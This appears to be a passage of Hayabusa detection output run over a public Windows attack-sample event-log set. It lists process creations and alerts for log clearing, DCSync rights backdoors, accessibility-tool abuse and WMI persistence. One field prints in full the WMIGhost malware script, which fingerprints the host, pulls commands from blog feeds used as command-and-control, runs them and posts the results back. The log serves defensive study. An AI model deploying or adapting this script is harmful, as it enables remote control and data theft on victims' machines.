C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.725 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.805 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.835 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.835 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.965 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.055 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.055 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.376 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.376 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.406 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.626 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:57.237 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:57.627 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.278 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.288 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.489 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.989 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:19:04.187 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:19:10.796 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.155 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.205 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.205 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.295 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:21:01.325 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:21:48.323 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:23:41.105 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:24:08.294 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:34:25.894 +00:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-19 23:35:07.524 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 09:09:14.916 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-25 21:28:11.073 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.022 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.022 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-03 18:11:54.098 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.098 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.178 +00:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.178 +00:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.198 +00:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:12:00.016 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:12:00.016 +00:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-18 16:55:37.014 +00:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.014 +00:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.115 +00:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.125 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.125 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:38.076 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.045 +00:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k 